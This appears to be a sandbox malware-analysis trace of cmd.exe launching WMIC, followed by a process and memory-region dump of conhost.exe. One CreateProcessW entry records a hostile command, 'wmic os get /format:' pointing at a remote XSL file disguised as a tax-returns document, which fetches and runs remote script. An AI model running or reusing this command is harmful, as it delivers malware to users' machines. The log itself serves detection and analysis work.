	[0048.756] _wcsicmp (_String1="wmic", _String2="MD") returned 10
	[0048.756] _wcsicmp (_String1="wmic", _String2="MKDIR") returned 10
	[0048.756] _wcsicmp (_String1="wmic", _String2="RD") returned 5
	[0048.756] _wcsicmp (_String1="wmic", _String2="RMDIR") returned 5
	[0048.757] _wcsicmp (_String1="wmic", _String2="PATH") returned 7
	[0048.757] _wcsicmp (_String1="wmic", _String2="GOTO") returned 16
	[0048.757] _wcsicmp (_String1="wmic", _String2="SHIFT") returned 4
	[0048.757] _wcsicmp (_String1="wmic", _String2="CLS") returned 20
	[0048.757] _wcsicmp (_String1="wmic", _String2="CALL") returned 20
	[0048.757] _wcsicmp (_String1="wmic", _String2="VERIFY") returned 1
	[0048.757] _wcsicmp (_String1="wmic", _String2="VER") returned 1
	[0048.757] _wcsicmp (_String1="wmic", _String2="VOL") returned 1
	[0048.757] _wcsicmp (_String1="wmic", _String2="EXIT") returned 18
	[0048.757] _wcsicmp (_String1="wmic", _String2="SETLOCAL") returned 4
	[0048.757] _wcsicmp (_String1="wmic", _String2="ENDLOCAL") returned 18
	[0048.757] _wcsicmp (_String1="wmic", _String2="TITLE") returned 3
	[0048.757] _wcsicmp (_String1="wmic", _String2="START") returned 4
	[0048.757] _wcsicmp (_String1="wmic", _String2="DPATH") returned 19
	[0048.757] _wcsicmp (_String1="wmic", _String2="KEYS") returned 12
	[0048.757] _wcsicmp (_String1="wmic", _String2="MOVE") returned 10
	[0048.757] _wcsicmp (_String1="wmic", _String2="PUSHD") returned 7
	[0048.757] _wcsicmp (_String1="wmic", _String2="POPD") returned 7
	[0048.757] _wcsicmp (_String1="wmic", _String2="ASSOC") returned 22
	[0048.757] _wcsicmp (_String1="wmic", _String2="FTYPE") returned 17
	[0048.757] _wcsicmp (_String1="wmic", _String2="BREAK") returned 21
	[0048.757] _wcsicmp (_String1="wmic", _String2="COLOR") returned 20
	[0048.757] _wcsicmp (_String1="wmic", _String2="MKLINK") returned 10
	[0048.757] _wcsicmp (_String1="wmic", _String2="DIR") returned 19
	[0048.757] _wcsicmp (_String1="wmic", _String2="ERASE") returned 18
	[0048.757] _wcsicmp (_String1="wmic", _String2="DEL") returned 19
	[0048.758] _wcsicmp (_String1="wmic", _String2="TYPE") returned 3
	[0048.758] _wcsicmp (_String1="wmic", _String2="COPY") returned 20
	[0048.758] _wcsicmp (_String1="wmic", _String2="CD") returned 20
	[0048.758] _wcsicmp (_String1="wmic", _String2="CHDIR") returned 20
	[0048.758] _wcsicmp (_String1="wmic", _String2="RENAME") returned 5
	[0048.758] _wcsicmp (_String1="wmic", _String2="REN") returned 5
	[0048.758] _wcsicmp (_String1="wmic", _String2="ECHO") returned 18
	[0048.758] _wcsicmp (_String1="wmic", _String2="SET") returned 4
	[0048.758] _wcsicmp (_String1="wmic", _String2="PAUSE") returned 7
	[0048.758] _wcsicmp (_String1="wmic", _String2="DATE") returned 19
	[0048.758] _wcsicmp (_String1="wmic", _String2="TIME") returned 3
	[0048.758] _wcsicmp (_String1="wmic", _String2="PROMPT") returned 7
	[0048.758] _wcsicmp (_String1="wmic", _String2="MD") returned 10
	[0048.758] _wcsicmp (_String1="wmic", _String2="MKDIR") returned 10
	[0048.758] _wcsicmp (_String1="wmic", _String2="RD") returned 5
	[0048.758] _wcsicmp (_String1="wmic", _String2="RMDIR") returned 5
	[0048.758] _wcsicmp (_String1="wmic", _String2="PATH") returned 7
	[0048.758] _wcsicmp (_String1="wmic", _String2="GOTO") returned 16
	[0048.758] _wcsicmp (_String1="wmic", _String2="SHIFT") returned 4
	[0048.758] _wcsicmp (_String1="wmic", _String2="CLS") returned 20
	[0048.758] _wcsicmp (_String1="wmic", _String2="CALL") returned 20
	[0048.758] _wcsicmp (_String1="wmic", _String2="VERIFY") returned 1
	[0048.758] _wcsicmp (_String1="wmic", _String2="VER") returned 1
	[0048.758] _wcsicmp (_String1="wmic", _String2="VOL") returned 1
	[0048.758] _wcsicmp (_String1="wmic", _String2="EXIT") returned 18
	[0048.758] _wcsicmp (_String1="wmic", _String2="SETLOCAL") returned 4
	[0048.758] _wcsicmp (_String1="wmic", _String2="ENDLOCAL") returned 18
	[0048.758] _wcsicmp (_String1="wmic", _String2="TITLE") returned 3
	[0048.758] _wcsicmp (_String1="wmic", _String2="START") returned 4
	[0048.758] _wcsicmp (_String1="wmic", _String2="DPATH") returned 19
	[0048.758] _wcsicmp (_String1="wmic", _String2="KEYS") returned 12
	[0048.758] _wcsicmp (_String1="wmic", _String2="MOVE") returned 10
	[0048.758] _wcsicmp (_String1="wmic", _String2="PUSHD") returned 7
	[0048.758] _wcsicmp (_String1="wmic", _String2="POPD") returned 7
	[0048.758] _wcsicmp (_String1="wmic", _String2="ASSOC") returned 22
	[0048.764] _wcsicmp (_String1="wmic", _String2="FTYPE") returned 17
	[0048.764] _wcsicmp (_String1="wmic", _String2="BREAK") returned 21
	[0048.764] _wcsicmp (_String1="wmic", _String2="COLOR") returned 20
	[0048.764] _wcsicmp (_String1="wmic", _String2="MKLINK") returned 10
	[0048.764] _wcsicmp (_String1="wmic", _String2="FOR") returned 17
	[0048.764] _wcsicmp (_String1="wmic", _String2="IF") returned 14
	[0048.764] _wcsicmp (_String1="wmic", _String2="REM") returned 5
	[0048.764] _wcsnicmp (_String1="wmic", _String2="cmd ", _MaxCount=0x4) returned 20
	[0048.765] SetErrorMode (uMode=0x0) returned 0x8001
	[0048.765] SetErrorMode (uMode=0x1) returned 0x0
	[0048.765] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x1ebe7638b00, lpFilePart=0x194ddff420 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x194ddff420*="Desktop") returned 0x19
	[0048.765] SetErrorMode (uMode=0x8001) returned 0x1
	[0048.765] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff6491496a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0048.765] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0048.771] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff6491496a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0048.776] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0048.776] FindFirstFileExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x194ddff1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x194ddff1a0) returned 0xffffffffffffffff
	[0048.776] GetLastError () returned 0x2
	[0048.776] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0048.776] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x194ddff1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x194ddff1a0) returned 0xffffffffffffffff
	[0048.778] GetLastError () returned 0x2
	[0048.778] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0048.779] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x194ddff1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x194ddff1a0) returned 0xffffffffffffffff
	[0048.779] GetLastError () returned 0x2
	[0048.779] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0048.779] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x194ddff1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x194ddff1a0) returned 0xffffffffffffffff
	[0048.779] GetLastError () returned 0x2
	[0048.779] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0048.779] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x194ddff1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x194ddff1a0) returned 0x1ebe7638eb0
	[0048.780] FindClose (in: hFindFile=0x1ebe7638eb0 | out: hFindFile=0x1ebe7638eb0) returned 1
	[0048.780] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x194ddff1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x194ddff1a0) returned 0xffffffffffffffff
	[0048.780] GetLastError () returned 0x2
	[0048.780] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x194ddff1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x194ddff1a0) returned 0x1ebe7638eb0
	[0048.780] FindClose (in: hFindFile=0x1ebe7638eb0 | out: hFindFile=0x1ebe7638eb0) returned 1
	[0048.780] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0048.780] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0048.780] GetConsoleTitleW (in: lpConsoleTitle=0x194ddff700, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\CMD.EXE") returned 0x1b
	[0048.781] InitializeProcThreadAttributeList (in: lpAttributeList=0x194ddff620, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x194ddff520 | out: lpAttributeList=0x194ddff620, lpSize=0x194ddff520) returned 1
	[0048.781] UpdateProcThreadAttribute (in: lpAttributeList=0x194ddff620, dwFlags=0x0, Attribute=0x60001, lpValue=0x194ddff50c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x194ddff620, lpPreviousValue=0x0) returned 1
	[0048.781] GetStartupInfoW (in: lpStartupInfo=0x194ddff5b0 | out: lpStartupInfo=0x194ddff5b0*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\CMD.EXE", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x7, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) 
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16
	[0048.781] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0048.782] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0048.782] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0048.782] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0048.782] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0048.782] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0048.782] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0048.782] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0048.782] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0048.782] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1
	[0048.783] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="wmic  os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\Nd9E1FYi\\Desktop", lpStartupInfo=0x194ddff540*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="wmic  os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x194ddff528 | out: lpCommandLine="wmic  os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ", lpProcessInformation=0x194ddff528*(hProcess=0x8c, hThread=0x88, dwProcessId=0xd94, dwThreadId=0xdf0)) returned 1
	[0049.155] CloseHandle (hObject=0x88) returned 1
	[0049.155] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0049.155] GetEnvironmentStringsW () returned 0x1ebe76358d0*
	[0049.155] FreeEnvironmentStringsA (penv="=") returned 1
	[0049.155] WaitForSingleObject (hHandle=0x8c, dwMilliseconds=0xffffffff) 

Thread:
	id = 38
	os_tid = 0xe24


Process:
	id = "3"
	image_name = "conhost.exe"
	filename = "c:\\windows\\system32\\conhost.exe"
	page_root = "0x33fa7000"
	os_pid = "0x4dc"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "2"
	os_parent_pid = "0xccc"
	cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
	cur_dir = "C:\\Windows"
	os_username = "X2VS1CUM\\Nd9E1FYi"
	os_groups = "X2VS1CUM\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb37" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 521
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 522
	        start_va = 0x90fa550000
	          end_va = 0x90fa58ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000090fa550000"
	        filename = ""

Region:
	              id = 523
	        start_va = 0x90fa600000
	          end_va = 0x90fa7fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000090fa600000"
	        filename = ""

Region:
	              id = 524
	        start_va = 0x1b69e450000
	          end_va = 0x1b69e46ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b69e450000"
	        filename = ""

Region:
	              id = 525
	        start_va = 0x1b69e470000
	          end_va = 0x1b69e484fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001b69e470000"
	        filename = ""

Region:
	              id = 526
	        start_va = 0x7df5ff0f0000
	          end_va = 0x7ff5ff0effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff0f0000"
	        filename = ""

Region:
	              id = 527
	        start_va = 0x7ff7ab0e0000
	          end_va = 0x7ff7ab102fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ab0e0000"
	        filename = ""

Region:
	              id = 528
	        start_va = 0x7ff7ab8e0000
	          end_va = 0x7ff7ab8f0fff
	     entry_point = 0x7ff7ab8e0000
	     region_type = mapped_file
	            name = "conhost.exe"
	        filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")

Region:
	              id = 529
	        start_va = 0x7ffc17400000
	          end_va = 0x7ffc175c0fff
	     entry_point = 0x7ffc17400000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 530
	        start_va = 0x1b69e550000
	          end_va = 0x1b69e64ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b69e550000"
	        filename = ""

Region:
	              id = 531
	        start_va = 0x7ffc14550000
	          end_va = 0x7ffc14737fff
	     entry_point = 0x7ffc14550000
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 532
	        start_va = 0x7ffc17120000
	          end_va = 0x7ffc171ccfff
	     entry_point = 0x7ffc17120000
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 533
	        start_va = 0x90fa590000
	          end_va = 0x90fa5cffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000090fa590000"
	        filename = ""

Region:
	              id = 534
	        start_va = 0x1b69e450000
	          end_va = 0x1b69e45ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001b69e450000"
	        filename = ""

Region:
	              id = 535
	        start_va = 0x1b69e490000
	          end_va = 0x1b69e54dfff
	     entry_point = 0x1b69e490000
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 536
	        start_va = 0x1b69e820000
	          end_va = 0x1b69e82ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b69e820000"
	        filename = ""

Region:
	              id = 537
	        start_va = 0x7ff7aafe0000
	          end_va = 0x7ff7ab0dffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7aafe0000"
	        filename = ""

Region:
	              id = 538
	        start_va = 0x7ffc164b0000
	          end_va = 0x7ffc1654cfff
	     entry_point = 0x7ffc164b0000
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 539
	        start_va = 0x1b69e460000
	          end_va = 0x1b69e466fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b69e460000"
	        filename = ""

Region:
	              id = 540
	        start_va = 0x1b69e650000
	          end_va = 0x1b69e650fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001b69e650000"
	        filename = ""

Region:
	              id = 541
	        start_va = 0x1b69e660000
	          end_va = 0x1b69e666fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b69e660000"
	        filename = ""

Region:
	              id = 542
	        start_va = 0x7ffbfcc10000
	          end_va = 0x7ffbfcc68fff
	     entry_point = 0x7ffbfcc10000
	     region_type = mapped_file
	            name = "conhostv2.dll"
	        filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")

Region:
	              id = 543
	        start_va = 0x7ffc11ef0000
	          end_va = 0x7ffc12075fff
	     entry_point = 0x7ffc11ef0000
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 544
	        start_va = 0x7ffc144e0000
	          end_va = 0x7ffc14549fff
	     entry_point = 0x7ffc144e0000
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 545
	        start_va = 0x7ffc14800000
	          end_va = 0x7ffc14942fff
	     entry_point = 0x7ffc14800000
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 546
	        start_va = 0x7ffc14950000
	          end_va = 0x7ffc14a6bfff
	     entry_point = 0x7ffc14950000
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 547
	        start_va = 0x7ffc15fd0000
	          end_va = 0x7ffc1624cfff
	     entry_point = 0x7ffc15fd0000
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 548
	        start_va = 0x7ffc16660000
	          end_va = 0x7ffc166bafff
	     entry_point = 0x7ffc16660000
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 549
	        start_va = 0x7ffc167d0000
	          end_va = 0x7ffc1680afff
	     entry_point = 0x7ffc167d0000
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 550
	        start_va = 0x7ffc169e0000
	          end_va = 0x7ffc16b65fff
	     entry_point = 0x7ffc169e0000
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 551
	        start_va = 0x7ffc16fb0000
	          end_va = 0x7ffc17070fff
	     entry_point = 0x7ffc16fb0000
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 552
	        start_va = 0x7ffc171d0000
	          end_va = 0x7ffc17325fff
	     entry_point = 0x7ffc171d0000
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 553
	        start_va = 0x90fa800000
	          end_va = 0x90fa83ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000090fa800000"
	        filename = ""

Region:
	              id = 554
	        start_va = 0x1b69e670000
	          end_va = 0x1b69e7f7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001b69e670000"
	        filename = ""

Region:
	              id = 555
	        start_va = 0x1b69e800000
	          end_va = 0x1b69e800fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b69e800000"
	        filename = ""

Region:
	              id = 556
	        start_va = 0x1b69e810000
	          end_va = 0x1b69e810fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b69e810000"
	        filename = ""

Region:
	              id = 557
	        start_va = 0x1b69e830000
	          end_va = 0x1b69e9b0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001b69e830000"
	        filename = ""

Region:
	              id = 558
	        start_va = 0x1b69e9c0000
	          end_va = 0x1b69fdbffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001b69e9c0000"
	        filename = ""

Region:
	              id = 559
	        start_va = 0x1b69fe50000
	          end_va = 0x1b69fe5ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b69fe50000"
	        filename = ""

Region:
	              id = 560
	        start_va = 0x7ffc13a20000
	          end_va = 0x7ffc13a33fff
	     entry_point = 0x7ffc13a20000
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 561
	        start_va = 0x7ffc13a40000
	          end_va = 0x7ffc13a8afff
	     entry_point = 0x7ffc13a40000
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 562
	        start_va = 0x7ffc13aa0000
	          end_va = 0x7ffc13aaefff
	     entry_point = 0x7ffc13aa0000
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 563
	        start_va = 0x7ffc13c50000
	          end_va = 0x7ffc14293fff
	     entry_point = 0x7ffc13c50000
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 564
	        start_va = 0x7ffc14490000
	          end_va = 0x7ffc144d2fff
	     entry_point = 0x7ffc14490000
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 565
	        start_va = 0x7ffc14740000
	          end_va = 0x7ffc147f4fff
	     entry_point = 0x7ffc14740000
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 566
	        start_va = 0x7ffc14a70000
	          end_va = 0x7ffc15fcefff
	     entry_point = 0x7ffc14a70000
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 567
	        start_va = 0x7ffc16250000
	          end_va = 0x7ffc162f6fff
	     entry_point = 0x7ffc16250000
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 568
	        start_va = 0x7ffc173a0000
	          end_va = 0x7ffc173f1fff
	     entry_point = 0x7ffc173a0000
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 569
	        start_va = 0x7ffc123a0000
	          end_va = 0x7ffc12435fff
	     entry_point = 0x7ffc123a0000
	     region_type = mapped_file
	            name = "uxtheme.dll"
